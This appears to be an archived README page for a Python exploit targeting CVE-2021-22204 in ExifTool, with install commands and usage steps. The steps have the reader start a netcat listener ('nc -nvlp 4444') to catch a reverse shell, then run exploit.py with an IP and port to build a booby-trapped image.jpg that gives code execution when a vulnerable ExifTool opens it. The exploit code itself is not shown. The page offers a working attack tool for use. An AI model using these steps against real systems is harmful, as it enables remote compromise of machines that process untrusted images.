来源

关联漏洞

描述

exiftool exploit

介绍

# CVE-2021-22204-exiftool
Python exploit for the CVE-2021-22204 vulnerability in Exiftool.
# Video tutorial
   ## Youtube 
        404 notfound
## Requirements 
    python3 python3-pip djvulibre-bin exiftool

# Install requirements 

   ## Debian
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Ubuntu
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Arch Linux
        pacman -S djvulibre libimage-exiftool-perl python python-pip
    
   ## Kali Linux
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Fedora
        dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
    
   ## OS X
        brew install djvulibre exiftool python
    
   ## Raspbian
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
 
# How to run:
   ## Install python requirements
        sudo pip install -r requirements.txt

   ## start reverse shell with natcat
        nc -nvlp 4444

   ## Give execute permission 
        chmod +x exploit.py
   ## Run program
        python3 exploit.py {Your IP add adress} {Your Listening port} 
        
   ### OR 
        
        ./exploit.py {Your IP add adress} {Your Listening port}
   ## Example
    
        python3 exploit.py 192.168.0.1 4444
        
   ### OR 
        
        ./exploit.py 192.168.0.1 4444
   ## Output file name is 
        image.jpg
        
# About the vulnerability

The CVE-2021-22204 was discovered and reported by William Bowling. (@wcbowling)

This exploit was made by studying the exiftool patch after the CVE was already reported.

And the image.jpg will trigger the vulnerability when opened with a vulnerable exiftool.

文件快照

 [4.0K]  /data/pocs/7163951b5b882f164392f173ef0cb92c746123f5
├── [ 69K]  exploit.py
├── [1.7K]  README.md
└── [  58]  requirements.txt

0 directories, 3 files

备注